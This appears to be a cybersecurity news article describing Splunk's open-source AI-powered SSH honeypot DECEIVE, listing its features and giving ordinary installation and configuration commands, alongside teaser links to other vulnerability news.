Thursday, May 1, 2025
HomeAISplunk Introduces "DECEIVE" an AI-Powered Honeypot to Track Cyber Threats

Splunk Introduces “DECEIVE” an AI-Powered Honeypot to Track Cyber Threats

Published on

SIEM as a Service

Follow Us on Google News

Splunk has unveiled DECEIVE (DECeption with Evaluative Integrated Validation Engine), an innovative, AI-augmented honeypot that mimics real-world systems to lure and study cyber attackers.

By leveraging advanced artificial intelligence, DECEIVE provides organizations with a powerful means of tracking, analyzing, and understanding malicious activities in real time, offering actionable insights into attacker tactics and techniques.

Revolutionizing Cybersecurity with DECEIVE

Traditional honeypots require significant effort to simulate realistic environments; they must be seeded with credible data and software to effectively engage attackers.

- Advertisement - Google News

DECEIVE eliminates this challenge by using AI to create highly believable, customizable system simulations.

This new approach allows enterprises to detect and investigate cyber threats while proactively maintaining minimal overhead.

DECEIVE is designed to emulate a Linux server accessible via the SSH protocol, logging all user activity, analyzing attacker behavior, and categorizing sessions as benign, suspicious, or malicious.

The lightweight and intuitive design is particularly useful for cybersecurity research, training, and internal testing.

Key Features Include:

  • AI-Powered Realism: DECEIVE uses AI to simulate operating environments based on user-configurable prompts, making tailored honeypots easy to deploy.
  • Comprehensive Logging: All username, password, and command inputs, as well as AI-generated responses, are logged to offer complete session insights.
  • Intelligence-Driven Analysis: Sessions are automatically classified into benign, suspicious, or malicious based on attacker actions.
  • Cross-Platform Support: Initially developed for macOS 15 (Sequoia), DECEIVE also runs on most UNIX-like systems, including Linux and Windows (via Windows Subsystem for Linux).

Getting Started with DECEIVE

To set up DECEIVE, users can follow these steps:

  1. Clone the Repository:
    Fetch the latest version of DECEIVE from its GitHub repository with this command:
git clone https://github.com/splunk/DECEIVE
  1. Install Dependencies:
    Ensure Python3 is installed, and use the following command to install the required Python modules:
pip3 install -r requirements.txt
  1. Generate SSH Host Keys:
    Create the necessary SSH TLS keypair with this command:
ssh-keygen -t rsa -b 4096 -f SSH/ssh_host_key
  1. Configure the Honeypot:
    • Copy the configuration template:
cp SSH/config.ini.TEMPLATE SSH/config.ini
  1. Edit the SSH/config.ini file to define system behavior, including the usernames and passwords attackers may attempt to use.
  2. Customize the SSH/prompt.txt file to describe the system being emulated. For example, you can specify:
    “You are a video game developer’s system containing realistic source and asset files.”
  3. Start the Server:
    Launch the honeypot by running the following command from the SSH directory:
python3 ./ssh_server.py

The server will listen for SSH connections on the configured port, silently logging all activity.

Splunk emphasizes that DECEIVE is a proof-of-concept and not yet production-grade. While the tool is invaluable for threat analysis, it must be deployed cautiously, as it logs sensitive information, such as usernames and passwords, for research purposes.

The project is open-source and available under the MIT license, encouraging contributions from the cybersecurity community. Developers and researchers can access the code, suggest improvements, or adapt DECEIVE to meet specific use cases.

The launch of DECEIVE underscores Splunk’s commitment to enhancing defensive cybersecurity measures.

By flipping the script and studying attackers in action, organizations can stay a step ahead in the ever-evolving threat landscape.

Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free

Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Latest articles

Netgear EX6200 Flaw Enables Remote Access and Data Theft

Security researchers have disclosed three critical vulnerabilities in the Netgear EX6200 Wi-Fi range extender...

Tesla Model 3 VCSEC Vulnerability Lets Hackers Run Arbitrary Code

A high security flaw in Tesla’s Model 3 vehicles, disclosed at the 2025 Pwn2Own...

Quantum Computing and Cybersecurity – What CISOs Need to Know Now

As quantum computing transitions from theoretical research to practical application, Chief Information Security Officers...

Apache ActiveMQ Vulnerability Lets Remote Hackers Execute Arbitrary Code

A high vulnerability in Apache ActiveMQ’s .NET Message Service (NMS) library has been uncovered,...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

Netgear EX6200 Flaw Enables Remote Access and Data Theft

Security researchers have disclosed three critical vulnerabilities in the Netgear EX6200 Wi-Fi range extender...

Tesla Model 3 VCSEC Vulnerability Lets Hackers Run Arbitrary Code

A high security flaw in Tesla’s Model 3 vehicles, disclosed at the 2025 Pwn2Own...

Apache ActiveMQ Vulnerability Lets Remote Hackers Execute Arbitrary Code

A high vulnerability in Apache ActiveMQ’s .NET Message Service (NMS) library has been uncovered,...